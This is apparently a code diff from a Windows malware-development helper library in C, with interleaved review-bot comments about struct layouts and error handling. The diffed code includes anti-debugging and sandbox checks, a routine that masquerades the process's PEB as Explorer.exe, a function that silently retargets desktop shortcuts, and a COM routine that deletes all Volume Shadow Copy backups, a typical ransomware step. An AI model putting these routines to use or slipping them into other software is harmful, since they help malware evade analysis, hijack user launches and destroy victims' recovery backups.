PVOID UnicodeCaseTableData;
|
||||
ULONG NumberOfProcessors;
|
||||
ULONG NtGlobalFlag;
|
||||
BYTE Spare2[0x4];
|
||||
LARGE_INTEGER CriticalSectionTimeout;
|
||||
ULONG HeapSegmentReserve;
|
||||
ULONG HeapSegmentCommit;
|
||||
ULONG HeapDeCommitTotalFreeThreshold;
|
||||
ULONG HeapDeCommitFreeBlockThreshold;
|
||||
ULONG NumberOfHeaps;
|
||||
ULONG MaximumNumberOfHeaps;
|
||||
PVOID** ProcessHeaps;
|
||||
PVOID GdiSharedHandleTable;
|
||||
PVOID ProcessStarterHelper;
|
||||
PVOID GdiDCAttributeList;
|
||||
PVOID LoaderLock;
|
||||
ULONG OSMajorVersion;
|
||||
ULONG OSMinorVersion;
|
||||
ULONG OSBuildNumber;
|
||||
ULONG OSPlatformId;
|
||||
ULONG ImageSubSystem;
|
||||
ULONG ImageSubSystemMajorVersion;
|
||||
ULONG ImageSubSystemMinorVersion;
|
||||
ULONG GdiHandleBuffer[0x22];
|
||||
ULONG PostProcessInitRoutine;
|
||||
ULONG TlsExpansionBitmap;
|
||||
BYTE TlsExpansionBitmapBits[0x80];
|
||||
ULONG SessionId;
|
||||
} PEB, * PPEB;
|
||||
|
||||
typedef struct __CLIENT_ID {
|
||||
HANDLE UniqueProcess;
|
||||
HANDLE UniqueThread;
|
||||
}CLIENT_ID, * PCLIENT_ID;
|
||||
|
||||
typedef PVOID PACTIVATION_CONTEXT;
|
||||
|
||||
typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
|
||||
struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
|
||||
PACTIVATION_CONTEXT ActivationContext;
|
||||
ULONG Flags;
|
||||
} RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
|
||||
|
||||
typedef struct _ACTIVATION_CONTEXT_STACK {
|
||||
PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
|
||||
LIST_ENTRY FrameListCache;
|
||||
ULONG Flags;
|
||||
ULONG NextCookieSequenceNumber;
|
||||
ULONG StackId;
|
||||
} ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;
|
||||
|
||||
typedef struct _GDI_TEB_BATCH {
|
||||
ULONG Offset;
|
||||
ULONG HDC;
|
||||
ULONG Buffer[310];
|
||||
} GDI_TEB_BATCH, * PGDI_TEB_BATCH;
|
||||
|
||||
typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
|
||||
ULONG Flags;
|
||||
PCHAR FrameName;
|
||||
} TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;
|
||||
|
||||
typedef struct _TEB_ACTIVE_FRAME {
|
||||
ULONG Flags;
|
||||
struct _TEB_ACTIVE_FRAME* Previous;
|
||||
PTEB_ACTIVE_FRAME_CONTEXT Context;
|
||||
} TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;
|
||||
|
||||
typedef struct _TEB
|
||||
{
|
||||
NT_TIB NtTib;
|
||||
PVOID EnvironmentPointer;
|
||||
CLIENT_ID ClientId;
|
||||
PVOID ActiveRpcHandle;
|
||||
PVOID ThreadLocalStoragePointer;
|
||||
PPEB ProcessEnvironmentBlock;
|
||||
ULONG LastErrorValue;
|
||||
ULONG CountOfOwnedCriticalSections;
|
||||
PVOID CsrClientThread;
|
||||
PVOID Win32ThreadInfo;
|
||||
ULONG User32Reserved[26];
|
||||
ULONG UserReserved[5];
|
||||
PVOID WOW32Reserved;
|
||||
LCID CurrentLocale;
|
||||
ULONG FpSoftwareStatusRegister;
|
||||
PVOID SystemReserved1[54];
|
||||
LONG ExceptionCode;
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer;
|
||||
UCHAR SpareBytes1[0x30 - 3 * sizeof(PVOID)];
|
||||
ULONG TxFsContext;
|
||||
#elif (NTDDI_VERSION >= NTDDI_WS03)
|
||||
PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
|
||||
UCHAR SpareBytes1[0x34 - 3 * sizeof(PVOID)];
|
||||
#else
|
||||
ACTIVATION_CONTEXT_STACK ActivationContextStack;
|
||||
UCHAR SpareBytes1[24];
|
||||
#endif
|
||||
GDI_TEB_BATCH GdiTebBatch;
|
||||
CLIENT_ID RealClientId;
|
||||
PVOID GdiCachedProcessHandle;
|
||||
ULONG GdiClientPID;
|
||||
ULONG GdiClientTID;
|
||||
PVOID GdiThreadLocalInfo;
|
||||
PSIZE_T Win32ClientInfo[62];
|
||||
PVOID glDispatchTable[233];
|
||||
PSIZE_T glReserved1[29];
|
||||
PVOID glReserved2;
|
||||
PVOID glSectionInfo;
|
||||
PVOID glSection;
|
||||
PVOID glTable;
|
||||
PVOID glCurrentRC;
|
||||
PVOID glContext;
|
||||
NTSTATUS LastStatusValue;
|
||||
UNICODE_STRING StaticUnicodeString;
|
||||
WCHAR StaticUnicodeBuffer[261];
|
||||
PVOID DeallocationStack;
|
||||
PVOID TlsSlots[64];
|
||||
LIST_ENTRY TlsLinks;
|
||||
PVOID Vdm;
|
||||
PVOID ReservedForNtRpc;
|
||||
PVOID DbgSsReserved[2];
|
||||
#if (NTDDI_VERSION >= NTDDI_WS03)
|
||||
ULONG HardErrorMode;
|
||||
#else
|
||||
ULONG HardErrorsAreDisabled;
|
||||
#endif
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
PVOID Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)];
|
||||
GUID ActivityId;
|
||||
PVOID SubProcessTag;
|
||||
PVOID EtwLocalData;
|
||||
PVOID EtwTraceData;
|
||||
#elif (NTDDI_VERSION >= NTDDI_WS03)
|
||||
PVOID Instrumentation[14];
|
||||
PVOID SubProcessTag;
|
||||
PVOID EtwLocalData;
|
||||
#else
|
||||
PVOID Instrumentation[16];
|
||||
#endif
|
||||
PVOID WinSockData;
|
||||
ULONG GdiBatchCount;
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
BOOLEAN SpareBool0;
|
||||
BOOLEAN SpareBool1;
|
||||
BOOLEAN SpareBool2;
|
||||
#else
|
||||
BOOLEAN InDbgPrint;
|
||||
BOOLEAN FreeStackOnTermination;
|
||||
BOOLEAN HasFiberData;
|
||||
#endif
|
||||
UCHAR IdealProcessor;
|
||||
#if (NTDDI_VERSION >= NTDDI_WS03)
|
||||
ULONG GuaranteedStackBytes;
|
||||
#else
|
||||
ULONG Spare3;
|
||||
#endif
|
||||
PVOID ReservedForPerf;
|
||||
PVOID ReservedForOle;
|
||||
ULONG WaitingOnLoaderLock;
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
PVOID SavedPriorityState;
|
||||
ULONG_PTR SoftPatchPtr1;
|
||||
ULONG_PTR ThreadPoolData;
|
||||
#elif (NTDDI_VERSION >= NTDDI_WS03)
|
||||
ULONG_PTR SparePointer1;
|
||||
ULONG_PTR SoftPatchPtr1;
|
||||
ULONG_PTR SoftPatchPtr2;
|
||||
#else
|
||||
Wx86ThreadState Wx86Thread;
|
||||
#endif
|
||||
PVOID* TlsExpansionSlots;
|
||||
#if defined(_WIN64) && !defined(EXPLICIT_32BIT)
|
||||
PVOID DeallocationBStore;
|
||||
PVOID BStoreLimit;
|
||||
#endif
|
||||
ULONG ImpersonationLocale;
|
||||
ULONG IsImpersonating;
|
||||
PVOID NlsCache;
|
||||
PVOID pShimData;
|
||||
ULONG HeapVirtualAffinity;
|
||||
HANDLE CurrentTransactionHandle;
|
||||
PTEB_ACTIVE_FRAME ActiveFrame;
|
||||
#if (NTDDI_VERSION >= NTDDI_WS03)
|
||||
PVOID FlsData;
|
||||
#endif
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
PVOID PreferredLangauges;
|
||||
PVOID UserPrefLanguages;
|
||||
PVOID MergedPrefLanguages;
|
||||
ULONG MuiImpersonation;
|
||||
union
|
||||
{
|
||||
struct
|
||||
{
|
||||
USHORT SpareCrossTebFlags : 16;
|
||||
};
|
||||
USHORT CrossTebFlags;
|
||||
};
|
||||
union
|
||||
{
|
||||
struct
|
||||
{
|
||||
USHORT DbgSafeThunkCall : 1;
|
||||
USHORT DbgInDebugPrint : 1;
|
||||
USHORT DbgHasFiberData : 1;
|
||||
USHORT DbgSkipThreadAttach : 1;
|
||||
USHORT DbgWerInShipAssertCode : 1;
|
||||
USHORT DbgIssuedInitialBp : 1;
|
||||
USHORT DbgClonedThread : 1;
|
||||
USHORT SpareSameTebBits : 9;
|
||||
};
|
||||
USHORT SameTebFlags;
|
||||
};
|
||||
PVOID TxnScopeEntercallback;
|
||||
PVOID TxnScopeExitCAllback;
|
||||
PVOID TxnScopeContext;
|
||||
ULONG LockCount;
|
||||
ULONG ProcessRundown;
|
||||
ULONG64 LastSwitchTime;
|
||||
ULONG64 TotalSwitchOutTime;
|
||||
LARGE_INTEGER WaitReasonBitMap;
|
||||
#else
|
||||
BOOLEAN SafeThunkCall;
|
||||
BOOLEAN BooleanSpare[3];
|
||||
#endif
|
||||
} TEB, * PTEB;
|
||||
|
||||
typedef struct _KSYSTEM_TIME
|
||||
{
|
||||
ULONG LowPart;
|
||||
LONG High1Time;
|
||||
LONG High2Time;
|
||||
} KSYSTEM_TIME, * PKSYSTEM_TIME;
|
||||
|
||||
typedef enum _NT_PRODUCT_TYPE
|
||||
{
|
||||
NtProductWinNt = 1,
|
||||
NtProductLanManNt = 2,
|
||||
NtProductServer = 3
|
||||
} NT_PRODUCT_TYPE;
|
||||
|
||||
typedef enum _ALTERNATIVE_ARCHITECTURE_TYPE
|
||||
{
|
||||
StandardDesign = 0,
|
||||
NEC98x86 = 1,
|
||||
EndAlternatives = 2
|
||||
} ALTERNATIVE_ARCHITECTURE_TYPE;
|
||||
|
||||
typedef struct _KUSER_SHARED_DATA {
|
||||
ULONG TickCountLowDeprecated;
|
||||
ULONG TickCountMultiplier;
|
||||
KSYSTEM_TIME InterruptTime;
|
||||
KSYSTEM_TIME SystemTime;
|
||||
KSYSTEM_TIME TimeZoneBias;
|
||||
USHORT ImageNumberLow;
|
||||
USHORT ImageNumberHigh;
|
||||
WCHAR NtSystemRoot[260];
|
||||
ULONG MaxStackTraceDepth;
|
||||
ULONG CryptoExponent;
|
||||
ULONG TimeZoneId;
|
||||
ULONG LargePageMinimum;
|
||||
ULONG AitSamplingValue;
|
||||
ULONG AppCompatFlag;
|
||||
ULONGLONG RNGSeedVersion;
|
||||
ULONG GlobalValidationRunlevel;
|
||||
LONG TimeZoneBiasStamp;
|
||||
ULONG NtBuildNumber;
|
||||
NT_PRODUCT_TYPE NtProductType;
|
||||
BOOLEAN ProductTypeIsValid;
|
||||
BOOLEAN Reserved0[1];
|
||||
USHORT NativeProcessorArchitecture;
|
||||
ULONG NtMajorVersion;
|
||||
ULONG NtMinorVersion;
|
||||
BOOLEAN ProcessorFeatures[PROCESSOR_FEATURE_MAX];
|
||||
ULONG Reserved1;
|
||||
ULONG Reserved3;
|
||||
ULONG TimeSlip;
|
||||
ALTERNATIVE_ARCHITECTURE_TYPE AlternativeArchitecture;
|
||||
ULONG BootId;
|
||||
LARGE_INTEGER SystemExpirationDate;
|
||||
ULONG SuiteMask;
|
||||
BOOLEAN KdDebuggerEnabled;
|
||||
union {
|
||||
UCHAR MitigationPolicies;
|
||||
struct {
|
||||
UCHAR NXSupportPolicy : 2;
|
||||
UCHAR SEHValidationPolicy : 2;
|
||||
UCHAR CurDirDevicesSkippedForDlls : 2;
|
||||
UCHAR Reserved : 2;
|
||||
};
|
||||
};
|
||||
USHORT CyclesPerYield;
|
||||
ULONG ActiveConsoleId;
|
||||
ULONG DismountCount;
|
||||
ULONG ComPlusPackage;
|
||||
ULONG LastSystemRITEventTickCount;
|
||||
ULONG NumberOfPhysicalPages;
|
||||
BOOLEAN SafeBootMode;
|
||||
UCHAR VirtualizationFlags;
|
||||
UCHAR Reserved12[2];
|
||||
union {
|
||||
ULONG SharedDataFlags;
|
||||
struct {
|
||||
ULONG DbgErrorPortPresent : 1;
|
||||
ULONG DbgElevationEnabled : 1;
|
||||
ULONG DbgVirtEnabled : 1;
|
||||
ULONG DbgInstallerDetectEnabled : 1;
|
||||
ULONG DbgLkgEnabled : 1;
|
||||
ULONG DbgDynProcessorEnabled : 1;
|
||||
ULONG DbgConsoleBrokerEnabled : 1;
|
||||
ULONG DbgSecureBootEnabled : 1;
|
||||
ULONG DbgMultiSessionSku : 1;
|
||||
ULONG DbgMultiUsersInSessionSku : 1;
|
||||
ULONG DbgStateSeparationEnabled : 1;
|
||||
ULONG SpareBits : 21;
|
||||
} DUMMYSTRUCTNAME2;
|
||||
} DUMMYUNIONNAME2;
|
||||
ULONG DataFlagsPad[1];
|
||||
ULONGLONG TestRetInstruction;
|
||||
LONGLONG QpcFrequency;
|
||||
ULONG SystemCall;
|
||||
ULONG Reserved2;
|
||||
ULONGLONG SystemCallPad[2];
|
||||
union {
|
||||
KSYSTEM_TIME TickCount;
|
||||
ULONG64 TickCountQuad;
|
||||
struct {
|
||||
ULONG ReservedTickCountOverlay[3];
|
||||
ULONG TickCountPad[1];
|
||||
} DUMMYSTRUCTNAME;
|
||||
} DUMMYUNIONNAME3;
|
||||
ULONG Cookie;
|
||||
ULONG CookiePad[1];
|
||||
LONGLONG ConsoleSessionForegroundProcessId;
|
||||
ULONGLONG TimeUpdateLock;
|
||||
ULONGLONG BaselineSystemTimeQpc;
|
||||
ULONGLONG BaselineInterruptTimeQpc;
|
||||
ULONGLONG QpcSystemTimeIncrement;
|
||||
ULONGLONG QpcInterruptTimeIncrement;
|
||||
UCHAR QpcSystemTimeIncrementShift;
|
||||
UCHAR QpcInterruptTimeIncrementShift;
|
||||
USHORT UnparkedProcessorCount;
|
||||
ULONG EnclaveFeatureMask[4];
|
||||
ULONG TelemetryCoverageRound;
|
||||
USHORT UserModeGlobalLogger[16];
|
||||
ULONG ImageFileExecutionOptions;
|
||||
ULONG LangGenerationCount;
|
||||
ULONGLONG Reserved4;
|
||||
ULONGLONG InterruptTimeBias;
|
||||
ULONGLONG QpcBias;
|
||||
ULONG ActiveProcessorCount;
|
||||
UCHAR ActiveGroupCount;
|
||||
UCHAR Reserved9;
|
||||
union {
|
||||
USHORT QpcData;
|
||||
struct {
|
||||
UCHAR QpcBypassEnabled;
|
||||
UCHAR QpcShift;
|
||||
};
|
||||
};
|
||||
LARGE_INTEGER TimeZoneBiasEffectiveStart;
|
||||
LARGE_INTEGER TimeZoneBiasEffectiveEnd;
|
||||
XSTATE_CONFIGURATION XState;
|
||||
KSYSTEM_TIME FeatureConfigurationChangeStamp;
|
||||
ULONG Spare;
|
||||
} KUSER_SHARED_DATA, * PKUSER_SHARED_DATA;
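Review bot: This header reproduces PEB/TEB/KUSER_SHARED_DATA layouts by hand and nothing checks them, yet every new helper in this commit reads through them; one wrong field width shifts everything after it. Two visible slips: `struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous` (double underscore) names a different, never-defined tag than `_RTL_ACTIVATION_CONTEXT_STACK_FRAME`, and `ULONG OSBuildNumber` occupies what public PEB layouts describe as `USHORT OSBuildNumber; USHORT OSCSDVersion;`, so build-number reads carry the CSD version in the high word. I would add compile-time pins for the members actually used on the supported target, e.g. under `#if defined(_WIN64)`: `C_ASSERT(FIELD_OFFSET(TEB, LastErrorValue) == 0x68);` and `C_ASSERT(FIELD_OFFSET(PEB, OSMajorVersion) == 0x118);` — values from my recollection of the x64 ntdll symbols, to be confirmed. Also note `UNICODE_STRING`/`PUNICODE_STRING` are redefined here, which will clash with `<winternl.h>` if any file includes both.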
|
|
@ -0,0 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL IsDebuggerPresentEx(VOID)
|
||||
{
|
||||
return GetPeb()->BeingDebugged;
|
||||
}
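Review bot: A one-line comment should say that this reads the same `PEB.BeingDebugged` byte that kernel32!IsDebuggerPresent returns, so it is an import-free equivalent rather than additional coverage — a debugger or plugin that clears that byte defeats both checks. Suggested: `/* Same PEB byte as kernel32!IsDebuggerPresent; avoids the import, not the bypass. */`.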
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL IsIntelHardwareBreakpointPresent(VOID)
|
||||
{
|
||||
BOOL bFlag = FALSE;
|
||||
|
@ -11,7 +13,7 @@ BOOL IsIntelHardwareBreakpointPresent(VOID)
|
|||
|
||||
Context->ContextFlags = CONTEXT_DEBUG_REGISTERS;
|
||||
|
||||
if (!GetThreadContext(RfGetCurrentThread(), Context))
|
||||
if (!GetThreadContext(GetCurrentThreadEx(), Context))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (Context->Dr0 || Context->Dr1 || Context->Dr2 || Context->Dr3)
|
||||
|
@ -23,4 +25,4 @@ EXIT_ROUTINE:
|
|||
VirtualFree(Context, 0, MEM_RELEASE);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL IsNvidiaGraphicsCardPresentA(VOID)
|
||||
{
|
||||
DISPLAY_DEVICEA DisplayDevice; RtlZeroMemory(&DisplayDevice, sizeof(DISPLAY_DEVICEA));
|
||||
|
@ -29,4 +31,4 @@ BOOL IsNvidiaGraphicsCardPresentW(VOID)
|
|||
}
|
||||
|
||||
return FALSE;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL IsPathValidA(PCHAR FilePath)
|
||||
{
|
||||
HANDLE hFile = INVALID_HANDLE_VALUE;
|
|
@ -1,3 +1,7 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
#include <psapi.h>
|
||||
|
||||
BOOL IsProcessRunningA(PCHAR ProcessNameWithExtension, BOOL IsCaseSensitive)
|
||||
{
|
||||
HANDLE hProcess = NULL;
|
||||
|
@ -98,4 +102,4 @@ BOOL IsProcessRunningW(PWCHAR ProcessNameWithExtension, BOOL IsCaseSensitive)
|
|||
}
|
||||
|
||||
return FALSE;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL IsProcessRunningAsAdmin(VOID)
|
||||
{
|
||||
HANDLE hToken = NULL;
|
||||
|
@ -5,7 +7,7 @@ BOOL IsProcessRunningAsAdmin(VOID)
|
|||
DWORD dwSize = 0;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
if (!OpenProcessToken(RfGetCurrentProcess(), TOKEN_QUERY, &hToken))
|
||||
if (!OpenProcessToken(GetCurrentProcessEx(), TOKEN_QUERY, &hToken))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &dwSize))
|
||||
|
@ -16,10 +18,10 @@ BOOL IsProcessRunningAsAdmin(VOID)
|
|||
EXIT_ROUTINE:
|
||||
|
||||
if (!bFlag)
|
||||
EhSetLastError(ERROR_ACCESS_DENIED);
|
||||
SetLastErrorEx(ERROR_ACCESS_DENIED);
|
||||
|
||||
if (hToken)
|
||||
CloseHandle(hToken);
|
||||
|
||||
return (bFlag ? Elevation.TokenIsElevated : FALSE);
|
||||
}
|
||||
}
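Review bot: `SetLastErrorEx(ERROR_ACCESS_DENIED)` on the failure path overwrites whatever OpenProcessToken or GetTokenInformation reported, so a caller cannot distinguish a missing privilege from an unsupported information class; either leave the last error alone or set it only when the API calls succeeded and the token was simply not elevated. The name `SetLastErrorEx` is also already declared by winuser.h (via `<Windows.h>`) as `VOID SetLastErrorEx(DWORD, DWORD)`, so a one-argument definition under that name should fail to compile wherever both are visible — a different name avoids it. Worth a comment too: `TokenElevation` reports UAC elevation, not Administrators membership, so an admin running with a filtered token returns FALSE here. The function begins before this hunk.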
|
|
@ -0,0 +1,18 @@
|
|||
#include <Windows.h>
|
||||
#include "Internal.h"
|
||||
#include "StringManipulation.h"
|
||||
#include "Win32Helper.h"
|
||||
|
||||
/*
|
||||
TODO:
|
||||
--Ping 'IcmpSendEcho2Ex'
|
||||
|
||||
|
||||
*/
|
||||
|
||||
|
||||
int main(VOID)
|
||||
{
|
||||
DWORD dwError = ERROR_SUCCESS;
|
||||
return ERROR_SUCCESS;
|
||||
}
|
|
@ -1,7 +1,5 @@
|
|||
/*
|
||||
Function to masquerade PEB originally by @FuzzySec / @Cneelis
|
||||
Optimized and unnecessary functionality removed by smelly__vx
|
||||
*/
|
||||
#include "Win32Helper.h"
|
||||
|
||||
BOOL MasqueradePebAsExplorerEx(VOID)
|
||||
{
|
||||
typedef NTSTATUS(NTAPI* RTLENTERCRITICALSECTION)(PRTL_CRITICAL_SECTION CriticalSection);
|
||||
|
@ -16,12 +14,12 @@ BOOL MasqueradePebAsExplorerEx(VOID)
|
|||
|
||||
Module = (PLDR_MODULE)((PBYTE)Peb->LoaderData->InMemoryOrderModuleList.Flink - 16);
|
||||
|
||||
hModule = RfGetModuleHandleW(L"ntdll.dll");
|
||||
hModule = GetModuleHandleExW(L"ntdll.dll");
|
||||
if (hModule == NULL)
|
||||
return FALSE;
|
||||
|
||||
RtlEnterCriticalSection = (RTLENTERCRITICALSECTION)RfGetProcAddressA((DWORD64)hModule, "RtlEnterCriticalSection");
|
||||
RtlLeaveCriticalSection = (RTLLEAVECRITICALSECTION)RfGetProcAddressA((DWORD64)hModule, "RtlLeaveCriticalSection");
|
||||
RtlEnterCriticalSection = (RTLENTERCRITICALSECTION)GetProcAddressA((DWORD64)hModule, "RtlEnterCriticalSection");
|
||||
RtlLeaveCriticalSection = (RTLLEAVECRITICALSECTION)GetProcAddressA((DWORD64)hModule, "RtlLeaveCriticalSection");
|
||||
|
||||
if (!RtlEnterCriticalSection || !RtlLeaveCriticalSection)
|
||||
return FALSE;
|
||||
|
@ -33,10 +31,13 @@ BOOL MasqueradePebAsExplorerEx(VOID)
|
|||
|
||||
RtlInitUnicodeString(&Peb->ProcessParameters->ImagePathName, wExplorerPath);
|
||||
RtlInitUnicodeString(&Peb->ProcessParameters->CommandLine, wExplorerPath);
|
||||
|
||||
Module = (PLDR_MODULE)((PBYTE)Peb->LoaderData->InMemoryOrderModuleList.Blink - 16);
|
||||
|
||||
RtlInitUnicodeString(&Module->FullDllName, wExplorerPath);
|
||||
RtlInitUnicodeString(&Module->BaseDllName, L"Explorer.exe");
|
||||
|
||||
RtlLeaveCriticalSection((PRTL_CRITICAL_SECTION)Peb->FastPebLock);
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
}
|
|
@ -1,17 +1,15 @@
|
|||
/*
|
||||
LnkPath = L"C:\\Users\\User1\\Desktop\\Chrome.exe.lnk" <--- MUST BE .LNK!
|
||||
NewValue = L"C:\\Windows\\System32\\calc.exe"
|
||||
#include "Win32Helper.h"
|
||||
|
||||
Chrome.exe.lnk on desktop now launches calc.exe
|
||||
*/
|
||||
#include <shobjidl_core.h>
|
||||
#include <shlguid.h>
|
||||
|
||||
BOOL MpfComModifyShortcutTargetW(PWCHAR LnkPath, PWCHAR NewValue)
|
||||
BOOL MpfComModifyShortcutTargetW(PWCHAR LnkPath, PWCHAR LnkExecutionProperty)
|
||||
{
|
||||
HRESULT Result = S_OK;
|
||||
IShellLinkW* Shell = NULL;
|
||||
IPersistFile* Persist = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
WIN32_FIND_DATAW Dispose = {0};
|
||||
WIN32_FIND_DATAW Dispose = { 0 };
|
||||
WCHAR PathData[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
|
||||
if (CoInitialize(NULL) != S_OK)
|
||||
|
@ -34,7 +32,7 @@ BOOL MpfComModifyShortcutTargetW(PWCHAR LnkPath, PWCHAR NewValue)
|
|||
goto EXIT_ROUTINE;
|
||||
#pragma warning(pop)
|
||||
|
||||
if (Shell->SetPath(NewValue) != S_OK)
|
||||
if (Shell->SetPath(LnkExecutionProperty) != S_OK)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (Persist->Save(LnkPath, FALSE) != S_OK)
|
||||
|
@ -58,7 +56,7 @@ EXIT_ROUTINE:
|
|||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL MpfComModifyShortcutTargetA(PCHAR LnkPath, PCHAR NewValue)
|
||||
BOOL MpfComModifyShortcutTargetA(PCHAR LnkPath, PCHAR LnkExecutionProperty)
|
||||
{
|
||||
HRESULT Result = S_OK;
|
||||
IShellLinkW* Shell = NULL;
|
||||
|
@ -73,7 +71,7 @@ BOOL MpfComModifyShortcutTargetA(PCHAR LnkPath, PCHAR NewValue)
|
|||
if (CharStringToWCharString(lpwLnkPath, LnkPath, StringLengthA(LnkPath)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CharStringToWCharString(lpwNewValue, NewValue, StringLengthA(NewValue)) == 0)
|
||||
if (CharStringToWCharString(lpwNewValue, LnkExecutionProperty, StringLengthA(LnkExecutionProperty)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CoInitialize(NULL) != S_OK)
|
||||
|
@ -118,4 +116,4 @@ EXIT_ROUTINE:
|
|||
CoUninitialize();
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
}
|
|
@ -1,7 +1,5 @@
|
|||
/*
|
||||
#include "Win32Helper.h"
|
||||
|
||||
Credit: am0nsec
|
||||
*/
|
||||
|
||||
CONST IID IID_IVssCoordinator = { 0xda9f41d4, 0x1a5d, 0x41d0, {0xa6, 0x14, 0x6d, 0xfd, 0x78, 0xdf, 0x5d, 0x05} };
|
||||
CONST IID CLSID_CVssCoordinator = { 0xe579ab5f, 0x1cc4, 0x44b4, {0xbe, 0xd9, 0xde, 0x09, 0x91, 0xff, 0x06, 0x23} };
|
||||
|
@ -156,7 +154,7 @@ DWORD InitializeComWithSecurityContextDefault(BOOL DisableSeh)
|
|||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
return EhWin32FromHResult(Result);
|
||||
return Win32FromHResult(Result);
|
||||
}
|
||||
|
||||
DWORD MpfComVssDeleteShadowVolumeBackups(BOOL CoUninitializeAfterCompletion)
|
||||
|
@ -210,8 +208,8 @@ DWORD MpfComVssDeleteShadowVolumeBackups(BOOL CoUninitializeAfterCompletion)
|
|||
if (Element.Type != VSS_OBJECT_SNAPSHOT)
|
||||
continue;
|
||||
|
||||
RtlZeroMemory(ShadowCopyId, (32 * sizeof(WCHAR)));
|
||||
RtlZeroMemory(ShadowCopySetId, (32 * sizeof(WCHAR)));
|
||||
ZeroMemoryEx(ShadowCopyId, (32 * sizeof(WCHAR)));
|
||||
ZeroMemoryEx(ShadowCopySetId, (32 * sizeof(WCHAR)));
|
||||
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 6386)
|
||||
|
@ -231,10 +229,10 @@ DWORD MpfComVssDeleteShadowVolumeBackups(BOOL CoUninitializeAfterCompletion)
|
|||
EXIT_ROUTINE:
|
||||
|
||||
if (ShadowCopyId)
|
||||
HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, ShadowCopyId);
|
||||
HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, ShadowCopyId);
|
||||
|
||||
if (ShadowCopySetId)
|
||||
HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, ShadowCopySetId);
|
||||
HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, ShadowCopySetId);
|
||||
|
||||
if (EnumObject)
|
||||
EnumObject->Release();
|
||||
|
@ -245,5 +243,5 @@ EXIT_ROUTINE:
|
|||
if (CoUninitializeAfterCompletion)
|
||||
CoUninitialize();
|
||||
|
||||
return EhWin32FromHResult(Result);
|
||||
}
|
||||
return Win32FromHResult(Result);
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD OleGetClipboardDataA(PCHAR Buffer)
|
||||
{
|
||||
DWORD dwError = ERROR_SUCCESS;
|
||||
|
@ -34,9 +36,9 @@ EXIT_ROUTINE:
|
|||
if (!bFlag)
|
||||
{
|
||||
if (Result != S_OK)
|
||||
dwError = EhWin32FromHResult(Result);
|
||||
dwError = Win32FromHResult(Result);
|
||||
else
|
||||
dwError = EhGetLastError();
|
||||
dwError = GetLastErrorEx();
|
||||
}
|
||||
|
||||
#pragma warning( push )
|
||||
|
@ -88,9 +90,9 @@ EXIT_ROUTINE:
|
|||
if (!bFlag)
|
||||
{
|
||||
if (Result != S_OK)
|
||||
dwError = EhWin32FromHResult(Result);
|
||||
dwError = Win32FromHResult(Result);
|
||||
else
|
||||
dwError = EhGetLastError();
|
||||
dwError = GetLastErrorEx();
|
||||
}
|
||||
|
||||
#pragma warning( push )
|
||||
|
@ -103,4 +105,4 @@ EXIT_ROUTINE:
|
|||
DataObject->Release();
|
||||
|
||||
return dwError;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
PVOID UserDefinedCallbackRoutineA(LPCSTR Path)
|
||||
{
|
||||
return 0;
|
||||
|
@ -8,7 +10,7 @@ BOOL UnusedSubroutineRecursiveFindFileMainA(LPCSTR Path, LPCSTR Pattern, PVOID p
|
|||
typedef LPWSTR(WINAPI* PATHCOMBINEA)(LPCSTR, LPCSTR, LPCSTR);
|
||||
PATHCOMBINEA PathCombineA = (PATHCOMBINEA)pfnPathCombineW;
|
||||
|
||||
HANDLE HeapHandle = RfGetProcessHeap();
|
||||
HANDLE HeapHandle = GetProcessHeapEx();
|
||||
CHAR szFullPattern[MAX_PATH] = { 0 };
|
||||
